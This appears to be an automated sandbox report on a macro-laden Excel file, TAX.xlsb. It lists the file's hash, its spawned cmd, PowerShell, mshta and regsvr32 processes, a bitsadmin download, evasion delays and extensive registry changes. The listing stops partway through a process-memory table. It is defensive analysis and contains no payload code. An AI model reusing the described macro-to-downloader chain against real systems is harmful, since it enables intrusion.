Malware Analysis Report

2025-03-15 07:11

Sample ID 230403-atghpsdb7y
Target TAX.xlsb
SHA256 ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c
Tags
macro xlm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c

Threat Level: Known bad

The file TAX.xlsb was found to be: Known bad.

Malicious Activity Summary

macro xlm

Process spawned unexpected child process

Suspicious Office macro

Blocklisted process makes network request

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Download via BitsAdmin

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-04-03 00:30

Signatures

Suspicious Office macro

macro xlm
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-04-03 00:30

Reported

2023-04-03 00:33

Platform

win7-20230220-en

Max time kernel

73s

Max time network

60s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TAX.xlsb

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\mshta.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\regsvr32.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1244 wrote to memory of 432 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 432 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 432 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 432 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 576 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 576 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 576 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 576 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 580 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 580 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 580 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 580 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 676 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 676 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 676 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 676 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 764 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
